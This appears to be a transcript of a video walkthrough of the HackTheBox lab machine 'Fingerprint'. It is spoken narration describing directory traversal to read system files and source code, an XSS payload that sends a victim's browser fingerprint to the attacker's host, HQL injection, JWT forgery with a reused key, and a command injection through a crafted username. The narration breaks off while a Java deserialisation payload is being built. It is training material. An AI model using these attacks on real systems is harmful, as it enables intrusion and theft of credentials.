What's going on YouTube? This is Ipsec. I'm doing Fingerprint from HackTheBox, which is an insane box, and it's insane because it's technically very tough. There's not a lot of steps to it, but each step is tough, and it doesn't really hide itself. The first part of the box is an HQL injection, which is very much similar to SQL injection, but it's just within Hibernate, and there's not a lot of information around that. If you found like HQL map to automate it, there's some steps to kind of break it, so you have to do that step manually. It's tough. But once you do that, you get access to some Java source code and have to craft a deserialization vulnerability by hand because the app doesn't use any common gadgets that you could do with wfuzz. Once you get code execution on the box, there's a setuid binary that you do some boolean logic to dump files. And then there's a crypto vulnerability where you can brute force blocks 1 byte at a time. So with that being said, let's just jump in. As always, we start off with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it fingerprint, and then the IP address, which is 10.10.11.127. This can take some time to run though, so I've already ran it. Looking at the results, we have just 3 ports open, the first one being SSH on port 22. Its banner tells us it's an Ubuntu server. Then we also have HTTP on port 80. Its banner tells us it's workzug and running Python version 2, which is ancient. But thankfully, not much really changed from Python 3 to 2, so even though we haven't done a Python 2 thing in a while, we should do just fine here. Then the final port is HTTP on port 8080, and this is running Sun Glassfish Open Source Edition 5.0.1. And whenever I read Sun, I just shudder because it probably means it's Oracle and Java and all those things that we hate. But I want to know when 5.0.1 was released. So let's just Google what Sun Glassfish is. And it's an open source Jakarta EE platform by Sun Microsystems. I'm guessing it's Java. I'm going to Google changelog 5.0.1. And we can see when this was potentially released. 5.0, 2017. I'm guessing it's 2017, 2018 era. I don't see anything that specifies 5.0.1, but chances are that is correct. So let's see. CVE details. We probably want to look through those. Let's see. Release 5.0. We only went there. I don't see anything with 5.0.1, right? But I don't think it's that important. I may do more research if I run into a dead end here to find out exactly when it was released and finding CVEs there. But because this one is Java, I'm going to ignore it and start with the Python piece, right? So let's just go to 10.10.11.127. And we could also, while that loads, make sure they're not the same thing, which we know they're not. So they are definitely different pages. So this one, the title is My Log. And these links don't go anywhere. Unlimited for all. We got a login panel. Copyright date of 2019. So that probably is correct because it is Python 2. I think these links all went nowhere. About us. Yeah, those go nowhere. There is a login panel. And I want to go to check this real quick. We have a copyright of 2018. So we are definitely dealing with some old technology. We can try admin password, and it doesn't even mask the password. We can try like or 1 = 1 and a comment, see if we can log in there. We should be running some type of recon in the background, so let's just do pharaohbuster -u, and I'm going to do -b to discover backups, and I think that's all I want. I thought it was -b. -B to collect backups. And we know this is Python, so there's no real extension we can do here. So we're just going to let that run. And right away, I noticed something really interesting. So we have /admin redirecting us to login, but the length is 59 and it's 104 words. Generally, when you just get a 302 redirect or a 301 redirect or any redirect in that matter, the size of it is very small because it's just the header, right? So this is, I want to say it's an execute after read, EAR vulnerability. I hate that terminology because EAR is also an extension for Java and a type of application, but that's a different tangent. So we should go check this out because this just screams weird, right? So let's go check out this login. I'm going to go to /admin. We're going to send this over to Burp Suite because this makes it easy to play with. And intercept is on. So when I go here, I'm going to right click, intercept the response to this request so we can see what the server sends back to us. I don't know why it just did a get here. There we go. So this is what we wanted. We get, oddly enough, HTTP 1.0, not 1.1. Hold on a second. I got to see this real quick. So if we go to /admin, we do a request on 1.1, so I don't know what is happening here, right? Intercept the response to this. So we got a 1.0. We can say 200 OK because by editing this, we're now changing it to tell a browser don't redirect because the 302 redirected us to wherever this location header was, right? We could delete that now because we don't need it. And a browser is just going to show us this information. So when we do this, we have logs, and it says auth.log, 0 bytes, and we got actions. I try to view auth.log, and we just get a blank page, but that makes sense because it's 0 bytes. So the next thing I'm going to do is go to 10.10.11.127, and we're going to try to log in, right, and see if we can put anything here. We did a login before, though. I tried like basic SQL injection, and we didn't get anything. If we refresh this page, it's 0 bytes. The title of this web page was my log, which is a bit weird. Let's try see if there's a login function on port 8080 just to see if we can submit anything. Authenticate now. Username, IPsec, password, please subscribe. And we get invalid credentials given. If we, I guess I have to, we can view the log again. And we have something. Oddly enough, we have this fingerprint. I don't know exactly what this is. Username IPsec. It's not logging the password, but we have stuff, which is, I guess, good. We can test for like cross-site scripting. Since we can see this data, I'm just going to put my name in bold and see if it filters it here. It does not. So we probably have cross-site scripting as well on this login form. The other thing we could test for, because we don't know there's like a user hitting this or anything or not, we can do some type of LFI potentially. So it's auth.log. And if I do a ls on var log, there is auth.log here. So I'm going to replace that with boot.log to see if I'm in var log, right? I don't think I am because auth.log normally means like SSH and things like that. But it's still worth checking. We get no such log found. The other thing we could try is like directory traversal here. So put a bunch of ... slashes and then try etc passwd, and we definitely do have something. We have a few users. We have John, which is the ID 1000, MySQL, and Flask. I'm going to guess that this one is the Flask application. There may be other hints at it, but it just being the Python and Flask is Python, I'm pretty sure this is definitely Flask. So I'm going to try proc self CMD line. That's generally the very first thing I look at. And we see Python 2.7 is running Flask on port 80. So that's definitely interesting. The other thing I like getting is environ. And we don't have anything, which is a bit weird. We can't read the environment file. We could look at stat. And this is the PID. This is the parent. So we don't even know the parent process ID. We could try like schedule debug is another good thing to get other processes. We could try like Java, and we see PIDs 1663, 1668, 1669. And we could try to view this information. So 1663/CMD line, no such log. What is it? 8 and 9. Could try viewing other processes like this, and we don't really get anything. So the next thing I would probably do is use the proc self cwd to get me to the current working directory of this Python application. And let's do a little fuzz here to see if we can find any source code. So for this, I'm going to do wfuzz-u, and we want to put HTTP 10.10.11.127. There we go. And then fuzz, and this is going to be a Python script, so I'm going to do fuzz.py. And we can do the word list, opt, sec list, discovery, web content, I think it's a capital W, then raf small words, .text. And it's going to take everything in this word list and add .py to it. And we're going to hide 4 words because 4 words is no such log found. So let's do --hw 4 and see if we get any hits here. And I guess while this runs, we could take a look at this cross-site scripting thing, right? We always want to do some type of recon going on in the background. So I'm going to try loading an image real quick. Image source is equal to HTTP 10.10.14.8, because that is my IP /image password. And while that runs, let's do nclvnp 80 and hit login. We get no invalid credentials, but I'm waiting to see if someone hits this, right? Because if they do, then we know we could probably script out something to steal cookies or something like that. And I wish I had sent that to Burp Suite so I could make sure I had typed that correctly. But let's go check out app, auth, and util.py, right? The other thing we could do, we could just hit this log again and see what the image looks like. So image source is equal to 10.10. I probably have to put a file here, right? Maybe not, because I did hit it. So there is that. We could try image source is equal to HTTP 10.10.14.8/ipsec.gif/image. I think that's the valid HTML. But we should really take a look at the source codes. So I'm just going to use curl to download them. So let's go back to Burp Suite, copy, and then we can do curl. And because it has the .. slashes, we have to do path as is. Otherwise, curl itself would be like, I forget what it's called. I think normalization of paths, where it would actually strip off these .. slashes. So if I do app.py here, we get Python source code. If I take off this path as is, we get not found, because what curl did is it just said, oh, we don't need these, and terminated them. Silly, but that's what happens. So let's make dir src, and I'm going to go in here. Actually, we should call this like py source or something, because there are 2 applications. And we can run curl -o app.py. There was a util. And what was the other one? Auth. And my netcat, I caught myself again, I think. Because we see, oh no, connection from 10.10.11.127. User agent Gozilla. So I'm guessing this is a Golang thing. It's a headless Chrome, but Gozilla. I don't know exactly what this is. But we got a referrer of fingerprint.hdb. So we know that cross-site scripting does something. But let's keep our focus down on viewing the source code since we're there now. So let's see. We have app.py, util.py, and auth.py. I'm doing this again because I realized I had downloaded auth.py and named it util.py. So these 3 files, we can vi app.py and see what happens here. So we got flask from .auth import check. So this is probably going to be the auth.py importing. Log path, data logs. So I'm guessing the auth.log is in data logs auth.log. We have a secret key, so we can probably forge tokens. Oddly enough, this isn't indented. I think they should be. So load user session get user ID main. It's going to render template. login. Yeah, this is weird that it's not indented, but oh well. Display like this. It's probably something to do with my curl or something, or maybe the LFI removes spaces at the beginning. So login doesn't have anything. Oh, let's see. No, /admin's where the execute after read was. I wanted to see exactly how that happens, right? So we have some log thing. If IP starts with 127.0, so I guess only this IP can? That's a weird one. Let's see, /admin. So the issue they have, I'm going to stop fixing the spacing because that's probably going to take a while. I just realized how big this file is. But right here, we're making the response, and then we're setting the headers and returning. But because we did this whole make response site content, it's adding the whole site content into this response, and then just says, turn it into a redirect. So you'd probably want this to be like make response nothing, or ideally like just set the header to 302. You don't want to make the response of site content because that's where the execute after read comes in. Let's see. Path, admin. So when we view, so we got path : log path. So this is how to do that directory traversal. I don't fully actually understand the directory traversal because normally when you do something in like Flask or Fast API, I would think you wouldn't be able to have ... slashes in here, but I'm guessing we can because we declared it probably as a path somehow. I don't fully understand that, but something to play with if you wanted to learn Flask and search other things. But there's really nothing interesting in this application. Like, we went over every function. I don't see any way to execute code. The one thing I am curious about is the database, right? So where is the database? That's probably going to be an auth check. So let's look at check.py. So, or auth.py is what it was called. And it's called users.db. So we can download this database probably. So let's go back to our curl, users.db, and we can download it this way, users.db. So if we do a strings on users.db, we have information. The better way to do it is SQLite 3, users.db. We can just .dump to dump everything. And we see the username admin, and you would never guess this password. So we could log into the application now. So if I go back, type admin, you would never guess this password. We get redirected to /admin, and we're here. Auth.log is 0 bytes again. So I'm going to try logging in this web page. We get invalid credentials given. So we know there's cross-site scripting here if someone views this page, which we know they do. But the other thing I'm going to check is like SQL injection. So let's try the whole admin or 1 = 1. And nothing happens. We can try admin or 1 = 1 and a comment. And this one is interesting. We get a error 500, internal server error. And it's a Hibernate issue. Now, I don't know a lot about Hibernate. If we went to like Google and Googled Hibernate Java, we get the wiki page that says, or this is something else, object relational persistence query service that like, I want to say it's similar to like SQL Alchemy and Python, but for Java. Like, it takes the database and converts it into an object relational database, and you can query things a bit easier in code, I guess. Not 100% positive that's correct, but that's how I view it. The downside to HQL is it's a very simple language, or at least in terms of exploitation. There's no like union into out file, XPCMD shell, like you can't execute commands. It's very boolean, so there's not much we can do, but there is stuff we can do. So let's go and send this query into Burp Suite. So if we do just a single quote here, let's go to Burp Suite, make sure I'm intercepting and don't have anything here, log in. So we don't need to do URL encoding because this is a post request. So if I just do UID is equal to single quote, we have the exception, right? I wonder if I can just keep exception and have it always go here. This is just saying, maybe I do note. So this is query exception. Like this is an invalid query. We can do or 1 equals 1. And when I do this, I'm going to put this in quotes because HQL also doesn't have a comment. So like in MySQL or SQL injection, we do or 1 equals 1 and comment out the rest of everything else. So when the server puts this single quote here, it doesn't matter because it's commented out. Hibernate doesn't have that, so you have to be very careful. So that's why I'm putting the 1 in single quotes, leaving 1 here because I know the HQL is going to add that for me, right? So we run this again. We look at the note, and we see query did not return a unique result, 2. So what this is saying is it's expecting UID to be unique. It's not, and we got 2 rows. So there's 2 users here. So what we have to do here is guess what the username variable is going to be because there's no like information schema table to just guess things like that. So the first thing I'm going to do is UID is equal to, and we could try admin because admin's generally a user, right? And we go to note, we look at this, SQL grammar could not extract result set. So UID is not it. We could try username, and we look at note. Oh, there is no note. It just says invalid fingerprint ID, which is this auth secondary thing. We can validate that, I think, if we go into the code. I have to turn Burp Suite off. Let's do Control U, view source, fingerprint. So auth secondary is a script, get fingerprint ID, which is declared in this login.js, I believe, which gets a fingerprint of a browser. And it's hard to like forge this because it does do like screen available width, available height. I guess we may be able to forge it if we download Gozilla, but if it uses like the IP address or things like that in this whole fingerprint hashing, it's going to be difficult. So I'd rather just steal this, right? So we could easily code a cookie stealer because we have cross-site scripting. We know someone hits a web page from that cross-site scripting. So let's dabble in that real quick. So what we want to do is direct them to a website and then steal the cookie, right? So that get fingerprint ID, where is it here? Is in this. So what I'm going to do is, let's see, let's get out of PySource, v exploit, we'll call this pwn.xss. So we're going to do script source is equal to HTTP. I think I have this in a clipboard, maybe. There we go. Now from the netcat, we know the referral is fingerprint.htb. So I'm going to replace this with fingerprint.htb. And this will help me like fix any type of browser security issues because the script it's loading from is going to come from the page that it's originally on, right? I don't think it's going to cause issues. I think we could use the same IP anyways, but always best practice when you can, right? So loading this login.js is going to allow us to call the get fingerprint function, right? So now I can do a document.write. And because I'm going to be cautious about special characters, I'm going to do this in several document.writes. So image source is equal to, I wonder if I need a quote. Let's try it without quotes, right? 10.10.14.8 / and then we can do document write. And this is get fingerprint ID. I think I have the casing correctly. Let me check. Yep, ID is capital. And then we do a third document.write. And let's close out the image source and say /image. So I think that should be good. What we probably want to do here is stand up a web server. So Python 3 http.server. Let's just listen on port 80. We probably have to do, wait. Oh, I didn't do -m. There we go. And now we can just cat pwn.xss and paste this into the username field and see if this works. So username, put something here. I think it's because we got that loading thing in the right, or the top, it's not working. There we go, invalid credentials. And then view auth.log. Let's get rid of this view source thing. So we actually process the HTML. And we didn't get anything. So right off the bat, we know something's wrong. I'm going to press F12, go to console, and get fingerprint ID is not defined. So do we have a typo here? Or did this script source not work? If we control U, we see script source. Ooh, it may have not worked because we don't have this host name. Sudo v etc host. Let's go 10.10.11.125 and call it fingerprint.htb. And as we're doing that, we see something get hit from 10.10.11.127. So I bet if I refresh this now, it may decide to work. Or something may be cached, but we see it works. So we don't need to put a quote actually here for image source. I'm used to it, but it's not needed. The reason why I didn't do a single quote is single quote would cause errors within Hibernate. The other thing we could have done is like a document.write and then did base64 encoding, like base64 something and do, I think, B to A in JavaScript and write base64, but this way worked as well. So we have the fingerprint of 10.10.11.127. So if we put this here for the auth secondary, we still get invalid fingerprint ID, which is weird. But remember, before we knew there were two users, so we could cheat, and I think we could do open close like this in Hibernate, and that's going to say where user is not admin. And here we go. It says document has moved, and we get a JWT. Now, that's not a great way to do it because it works because there's only two users in this database. It's kind of like a CTF gimmick that you can use. But the other thing we could have done is use substrings. So, or we can say substring, and then the column name, which is user, 11. So this is going to be the first character and only one character is equal to A, right? And now we get invalid fingerprint ID. If we do B, invalid credentials, C, D, E, F, and eventually get it, right? And this would probably be better in like intruder or coding a Python script, but we know M is the first character. And then if we wanted to get multiple characters, we could try 1, 2. And I think this means the first character, the second thing. So first names that begin with M, like Matt, invalid credentials, maybe Mike, we get document moved. Let's get 3 characters, right? We're assuming this is Mike, so M-I-K, no. How about Michael or Mitchell? We have document moved. So this is how we could brute force information out of this database, right? It's a nasty Python script to write. There is a tool called HQL map, but it's Python 2 and a bit of a pain. So I'm not going to cover that. Maybe in a separate video I will. But for this, all we need is username 1 equals 1, and we can get this JWT token, right? So let's write this in a file. So jwt.out, just so we have logs of it. And then we go to jwt.io, a favorite site for manipulating JWT tokens, or just JWTs, because T stands for token, I think. So I think it's JSON Web Token. But looking at it, we see this is a Java serialized object in base64 form. After dealing with them enough, you just recognize them by the site. This roab means base64 encoded Java. If it began with like ACED, that should be a Java serialized object that is not base64 encoded. Those are just like magic things that stick out to anyone that's ever done Java deserialization. So we can take a look at this. If I echo -n base64-d and then strings, we actually only want this piece. I thought I copied it. Maybe I did the wrong paste. There we go. And then strings, and we can see kind of what it looks like. So the username's Michael. I think this is the password, or maybe Michael is the username and 12345 is the password. We could probably try logging in to see exactly what happens. So let's try, I guess, that. The only thing we'll have to do is change a fingerprint and hope that every request we make to this web application doesn't do a fingerprint check, right? So if we authenticate now, let's try Michael. Did I spell that right? EAL 12345, and then put a paste here. I had that on my clipboard. I should have just pasted. Paste this. Okay. Let's go Burp Suite. Refresh this to log in. Okay. And the secondary we want to put to be this. Because this is Michael's browser fingerprint, right? So we try to log in. Invalid credentials. That's annoying. So maybe that's like, is this base64 or maybe not his password? Echo-n. I don't think that's base64, right? I just did nothing. Yeah, invalid input. Well, we can log in with him anyways, right? So if we just do Michael 12345 and then a blank password. Why did we not intercept that? Because intercept is off. Let's just put junk in. And then we can go to repeater. This field worked to log in, right? So we can just copy this whole thing over, paste it in, and be super lazy. So we get /welcome, and we're logged in. So only pictures allowed. We can browse for your pic and submit. So I'm not sure what to do here. We haven't run a dirbuster on this URL, right? So we probably should do that. So just pharaohbuster-u, put this in. There were no extensions, so just let this run. And we're getting quite a few hits. And pharaohbuster is going to take a long time because it's going to go into all of these directories. One directory that we may want to go in is this backups directory, right? Because we have that, but -h. I don't like doing recurse the first time because it takes a while, so I'm going to do -n. And again, just seeing what we have. These redirects, we see it's a 301, but only 13 words, so I doubt there's really anything there. And everything is pretty much the same, right? This welcome is 183 characters. Backups is 183 characters. Login is slightly less, but maybe the character difference is in this URL, right? Because backups isn't the same length as login. So we see 3 characters and PS/, so that's probably it, right? we're looking at webinf and backups, and those go to the same spot, so they're the same length. So no execute after read here. We have JSecurity check, which I think is a Java thing. But the main thing is this backups directory, right? So let's go take a look at /backups to see what is here. Backups, and we get a 404 not found. Now, if this is a backups of Java code, it's not a large stretch to say it's going to end in .java, because Java files are like the file name .java. So let's do a search here just to see if Pharaohbuster finds anything. We probably could have also done it in wfuzz because that's how we did the Python thing. Only reason I used Pharaohbuster here is because I could just hit the up arrow, right? And we're looking for it. We could kind of guess our way, so we could try like user.java and we get a file. I'm sure it's going to show up here, or maybe not because of casing. Let's see. Wrapped medium directories. I wonder if we could specify a different word list. grep user. Let's do end and begin. So there is user in it. So I think Pharaohbuster will eventually find it, but it just takes a while. So we have source code here. So we should download this source to our computer. So I'm going to make dir java source. Let's go in here and do a curl. Actually, I'm just going to do wget so I don't have to type it twice, right? So we can do user.java. Look at this file. And let's see. So this is the application name, maybe the class path or the package name. I'm not a Java guy, so I don't know. But there are two potential files, like fileutil.java and serutil.java. So let's try downloading those. So fileutil, nope. serutil, nope, nothing there. So we're looking at this. Username, password, fingerprint. We could try like fingerprint.java. We have profile here. Let's see. We have model user profile storage. So let's try that. User profile storage.java. That is one. So if we look at this, we have .profile.user. We already tried serutils. There's a terminal, so I'm going to try grabbing terminal.java. Maybe inside a profile there is a auth log, but I'm also going to try settings.java. So let's do profile. Okay. And then settings, not found. See if there's anything else in this file. We did settings. Doesn't look to be. So let's take a look at the last file we downloaded, which is profile. See if there's anything else. We have profile.java.java. We got user profile storage already. Get for user. So looks like we have all the files. Taking a look back at Pharaohbuster, oddly enough, it did not find it, which is weird. I assumed it would have. I'm guessing this is user error. I'm going to try GoBuster real quick. GoBuster, dir, extension, Java. I'm going to give it the same exact word list, even though I normally don't use wrapped medium dictionaries. But we had done, I thought, that grep on it. So we know it exists. And the extension is Java. Extension for Pharaohbuster is .java. And now we're finding it. So if you're wondering why like I don't change tools that often, this is kind of why. I'm sure I'm doing something wrong here. Maybe I need to add force recursion because it doesn't want to go outside of this backups directory, right? But definitely something is slightly off here. So definitely know your tools. So let's go, and apologies for the sloppy cut. I did want to go over exactly what the issue was because I find it actually pretty cool. And I'm sure it's going to be fixed soon enough, and probably why I missed things in the past with Farabuster that turned me off of it. So these are the commands I ran with both. GoBuster, we see this command and it found it. The issue is the dot. Farabuster doesn't want dots and extension, and GoBuster honestly doesn't care because if I do just Java, it's going to find this right away. Actually, let's just do vi word list. And we can say user does not exist. Please sub. So we have a shorter word list. And we can specify -w to be word list. And we see it finds it, right? If we put a period, it'll still find it because GoBuster is smart enough to know the extension just wants period something. If they put a period, fine, have them. Farabuster, if we do this backups, I think this was my query exactly. If we do .java and then word list for, I think I called it word list, we see it finds nothing, right? But if I take off the period, it's now going to find it. So the extensions in Farabuster, at least right now, don't want a period before it, but GoBuster, it doesn't matter. So hopefully that you found that piece interesting, or at least that helps you. But now we can go back to the regularly scheduled programming and go over the Java source code. And I can't stress enough how many mistakes and wrong things I'm about to say. Like, I'm not a Java programmer, and it's one of those things I've always put off learning. It's kind of like a lot of people like reverse engineering or binary exploitation. I don't really learn it, but these videos force me into it. So this is my understanding of it as of today. So I'm just going to look at these files, like probably sequentially, starting with profile. So let's look at it. And again, I've done this before, so this is going to be my recollection. We have it loading a bunch of things. And then let's see here. We have a public function get for user. And if there is no profile on the disk, it's going to create one. I don't know exactly, how it identifies if a user is admin. We may be able to take a look at that. Maybe look for like it is admin function in user.java. And then down here, we have it initializing logs. So after the profile is created, it's going to do this user profile storage thing and call read profile. So I just want to see like is user.java. Do we have like an is admin? So return username equals I'm guessing if the username is the string admin, it's going to return, which means it's going to be true. Else, maybe it will return false. Yeah. So if the username doesn't equal admin, it's going to return false. If it does, then it's going to return true. So that's kind of how this works. We're getting where the profiles are stored, data sessions. And I don't know much else about this file. So let's just go to user profile storage and see what this is. So the main thing we want to focus on is this read profile, which looks like that's all there is because the profile thing executes this, right? So I guess paths file, I think we're reading the profile right here. Yes. So profile file is going to be the profile location. It's going to read it, and then it's going to check if it's an admin profile. And if it is an admin profile, it's going to run this shell command, which is an obvious command injection vulnerability. So if we can control either this auth.log variable or this username variable, we can get code execution in this. And we do have the JWT remember this object, this is going to be what specifies our username. So we definitely can inject into here. So for this attack, it's going to depend on three things. Number one, we have the signing key to this JWT, which I believe we do. If we go back into, I want to say it was repeater, where is our LFI? So if we look at app.py here, we could have went into our Python source directory. We can just try this secret key to see if they reuse secret keys. Paste it in, signature verified. So the first step to this is done. We have a way to manipulate this Java object. The other piece we have to do is we have to make our user an admin. And we can do that by just writing a serialized profile to the disk, potentially, because there was an upload piece here. Which window was it? This welcome. We browse for something. Let's see. I'm just going to make dir ipsec.ser for ipsec.serialized. It's not going to have data, but we're just going to see if we can upload something. So HTB, what is it? This is Fingerprint. And then we want to put, oh, I created a directory? Yeah, I did. Let's do touch. There we go. And go here, submit it. Did that submit? Intercept is off. If we go here, we can look at exactly what it did. So here's us uploading. And then the response, it uploaded to data uploads ipsec.ser. So what we want to do here is let's go back to the JWT and look at this. So echo-n base64-d, and I'm just going to strings it. So this is our JWT, and our username is Michael1234. And what it's going to do is probably look in, where was it? The read profile. Go here. Is it less profile.vim? Or let's, syntax highlighting is nice. Get profile location. Where is it? Admin profile, was it user? I could have swore we saw it. Serializable. Okay. So what it's going to do is make a call. Let's see, which thing do I have it as? So it's going to try to load opt data Michael12345, right? I'm not sure if it appends anything. I don't think it does. But it's going to attempt to load this for the user profile. Make dir, oh, it appends.ser for serialized. So we can see it's going to try to load this. And that's going to be the username. So what if we made something like ... go up a few directories? We probably only have to go up 2 directories because we're in up data. So this will put us in /. And then we can do a command execution. So I'm going to like ping my host first, right? And we got to remember to do -c for count 1. So we only send 1 ping. And then we want to go up 1 directory again because we ran this ping. And from here, we can do data uploads ipsec.ser. So what this is going to do is our profile, when it goes to do the whole read thing, it's going to, instead of reading from opt data, it's going to read from data uploads because the read profile strings is going to do something like this, right? And all this piece doesn't matter. And because we're going up to the root directory, this piece doesn't matter. And we're just saying now the profile is stored in data uploads, and it's going to read whatever serialized object we write to. And we're going to tell them that IPSEC is an admin. So because IPsec is an admin, it's now going to, when it reads this, we pass this because IPsec is admin. And then when it does get username, this grep, we're going to get command execution because our username is going to have that bash thing in it where we do this, right? So that's in theory what we are going to be doing. And if that sounded complex, it's probably going to get a bit tougher because we have to write a quick Java app because this is all a custom application. We can't use why_serial because it's not using like common collections or some known gadgets. So we have to craft a serialized object by hand. And to do that, which is open Eclipse. And it's been a while since we've done this, probably since the Fatty video. We see 2020-06. That's probably when I installed Fatty. Oh, this is, I think, a Minecraft plugin, dummy plugin. So was that Dip Slasher? So we've done this twice, I guess. And probably like twice in my life that I've opened up Eclipse and actually made a working project. So this will go swimmingly, right? Let's make the directory Fingerprint. And then use the directory user profile. And I think I want to check that. I don't know. My catalog is definitely going to be Maven. I want to do quick start. And can I sort by artifact ID? I can't. Maybe I want like Maven dash. I want quick start in this. Archetype dash quick. Okay. And I'm going to choose this one. This org Apache Maven archetypes because I don't know exactly what those are. So this is the one I want to do. And the quick start just creates a sample like hello world application for you. The group ID, that's going to be pulled from the source code that we have. And let's see, user.java. It's going to be com admin security source. And then artifact ID, I'm going to call it exploit. This is going to be the name of our application. And then I think I click finish. POM XML already exists here. What? Let's see. User profile. Let's go back. Let's not use the default workspace location and specify our own. And then finish. There we go. That's what I wanted. And if I do source, main, java, com, admin, security, source, exploit, app.java, we can see our code, right? If I click run, we get hello world. We can change this to be anything we want. So just to test it, click run again. And we have that. So what we have to do now is import our other applications, right? And to do that, I'm just going to manually copy it. It's probably not the correct way to do it, but it's the way I'm going to do it. So if we go into main, Java security source, we don't want to go to exploit. We just want to stop there. And let's go to Java source, cap, let's see, profile. Do we know where profile is? Let's see, I'm going to guess it's going to be under model. And user profile storage is under profile. Let's look at user, see if this says anything. That says model. We'll also need to create these two files, the file util and ser util. So let's make dir, is it model or models? Model. And I think the other one was profile. Let's look at user profile storage. Yep, it is profile. So we create both of these. We have now two directories, and we can copy the files out of them, or to them. So cp, this will be user.java, that goes in model. Profile.java goes into model. And then the other one, Oh, shoot. User profile goes into profile. There we go. So now we have the three source files. If I find it, we can see they all exist. So what I want to do is refresh. So right click, refresh, and we have a bunch of syntax errors. We can see the file is red, so we have to fix these things. Let's see. This wants declarations. So let's go to this one. What is this? So it's erroring right here for file utils and ser utils. So we'll definitely have to create those. We got this lombok, and if I Googled like lombok pom.xml, which is the package manager for, I want to say, Maven, it gives us instructions on adding it. So add this to a pom.xml. Under dependencies, add this. So that's what I do here. So if we go to pom.xml, dependency, let's add that, save it. We go back to where we were, and we see those have been fixed. This JavaX persistence thing, I think we can just completely remove this. If we Google JavaX docs, let's see what happens with this. JavaX, JDK 11. We want to remove all these references because we don't need to use JavaX. So my computer's hanging slightly, so that's not good. Hopefully the recording is still going. And did Eclipse just crash on me? It did. That's not polite. I probably ran out of memory on this VM or something. Let's see, exploit. Let's go here. Model. We were on user, right? Wait. User does not exist? Did it delete that file? Let's see, less model. Let's see, last model user. File exists. Refresh. Let's close it here. Close all these. There we go. Okay, no idea. Well, lombok is still fine. Let's get rid of Java persistence. And we want to remove anything that it used. And to do that, we could have been like more thorough and like compare against the documentation. However, I'm going to remove what our IDE tells us we don't have defined. So just going to remove all these things. Okay. So that is fixed. Now we have this file util and ser util. And ser utils is calling to byte array, and file util is calling a write. So these errors are expected because we don't have these files yet. But we'll get to that soon enough. Let's expand all these. Ser utils we don't have yet. Terminal. We should see what terminal uses. Terminal is doing this cmd run, and this is part of like the web portion code. We don't need this piece because we don't want to execute code on ourselves. All we want to do is create the variables in that serialized structure. The serialized structure doesn't have the whole command runner piece in. We just want to create that user. So we can safely delete that. And we can delete terminal from up here. And this auth log thing, we also don't need. This is just getting the settings where the authentication log is stored. So remove that. Okay. We're left with cer utils from. So I'm guessing this is going to be like a deserialization function. So we did user profile. We can go here and see what everything is. It wants a lot of constructors. And this is a piece, I don't know really what I'm doing here. We're going to hope it works. I'm just going to let it solve things for me by highlighting over and initializing the field. This is a boolean. I'm just going to say admin profile is always going to be true. And then the next thing is we have this where it's creating the new profile. We can create the constructor. Create constructor. There we go. And there are things we have to put in this. We got to say like where these two arguments go. And the two arguments are going to be logs and admin profile. So I can just say this.logs, and I'm going to put it to null, and then this.admin profile. And we're going to set it to be whatever admin is set as, which is probably going to be true. And I'm guessing we have to remove some of the declarations here. Yeah. So remove. And I don't think we need like this equals true anymore. We could probably leave it just like that. But I think if we do this, it'll default to true, which is what we always want, right? So if we didn't specify something here, hopefully it would default to true. I'm not positive. Again, not a Java coder. So let's create a thing here. And this user profile storage, we got user2. So I'm just going to do this.user is equal to user2. And that should be set. And again, like if we did, I don't know if we want final. This is probably correct how it is. But that's besides the point. So that one's set. If we do this, I think it's time to create this surutils and I guess file util. So what does file util use? If we look at file util, it's got a write function. So this is going to probably write a profile. So we just want a thing that writes bytes to Java, or writes bytes in Java. So let me turn Burp Suite off, and I'm just going to Google writing byte file Java and see if we get something, right? So something right here. This Java NIO is probably going to be the cleanest. So all we have to do is create a function for this, and that will go into a utils called fileutil.java. And again, my Eclipse crashed. Something is wonky with this VM. If this doesn't work in the end, I'm not going to be surprised in the slightest because of all the times my Eclipse has crashed. I've edited a few of those crashes out just because I know it's annoying. But let's see, source. Probably should close, like reset burp and clean up some memory on this VM or assign more memory. I'm guessing it's out of memory issues. So I wanted to say, did I put it on my clipboard? I do not have my clipboard. Shoot. So we can add this again. And if I keep having, maybe I'll just do the rest of this in Vim. Whenever I'm running Eclipse now, I don't have memory, so it's definitely a memory issue. Close a bunch of these. I want to leave that JWT. There we go. We have less tabs. Oh, Burp Suite's closed as well. Maybe I need to reboot my VM. So I guess I should add more memory to this when I'm doing Eclipse things. But hopefully closing those tabs fixes it. So let's go back in here. The Burp Suite being crashed is going to be annoying because I had some good like repeater tabs in that. But oh well. Let's see. This user.java, it's just utils. So make dir utils, and we refresh. We probably could have done it from this GUI. Let's see. New file, and I'm going to call it, what is it? Fileutil.java. Okay. This is a bit weird. I had expected it to like add some boilerplate code for me, so I probably did something wrong. It also added up here, but I bet if I refresh, we can see the file down here. But like boilerplate code, for instance, like the first thing was always this package line that states where it is. So we'd put this in. This isn't in profile, it's in utils. And then we need like public class, the name of this, file util, and then public static void. I want to say this one used right, so we can define the data, and then we also need the file name. And this will throw IO exception. Okay. And now we can go over here and copy the file right. And full disclosure, my Eclipse had crashed yet again. If we look in here, we can see, I'm guessing all these are Eclipse crashes, right? So it's crashed quite a bit when doing this video. I just upped the memory of this VM to 12 gigs. It was at 8 gigs. So hopefully that fixes that issue, but we'll have issues later on in this video. So we have that. Before we write to the file, we want to make sure the file exists. So we can do is file, and well, this is going to do if this is not a file, then we can create a file from it. And after the file is created, we can write. So files.write, and we just kind of change up the path. So we called it file, and it's a get absolute path right there. And this other piece, we're calling it data. Okay. And now we have to do all the import statements. So because we're in our IDE, this makes it easy. We can just go and import things. It's automatically importing that Java NIO file, which is good. This is not importing something. File write. This is paths.get. And we can import paths, I believe. There we go. And then this next one, I don't think we want this to be a string. What's this error? Oh, we have mismatched parentheses. There we go. That looks good. So now we have the file util. Which thing used it? This app. And file util. This is the data, and then this is going to be the location, so that looks good. What we have to do now is create serutils. So let's do new. I'm just going to, can I copy this? Copy, paste, and I'm going to call it serutils. Okay, refresh. We could have clicked on it up there. The main reason I did that is so I didn't have to redo this piece. So this one, public class, serutils, and we're going to have different functions here. What use serutils? I'm just going to go back here, and you can see all my tmux panes are gone because, well, we rebooted. So we have a 2-byte array, and this is just profile. So this is just a serialized function. And it probably doesn't use common utils, because if it did, there's a gadget in common utils with wfuzz to get code execution. So they're just doing this manually, I guess. That would be my guess at why. I'm guessing from is deserialized. So we need two functions, 2-byte array. So I'm just going to copy these out. So copy, and then we can copy this one. Okay. And now we're off to copy and paste more code. So I'm just going to go to Google and say convert object to byte array Java. And we can go to Stack Overflow and see what they have. So scrolling down, it 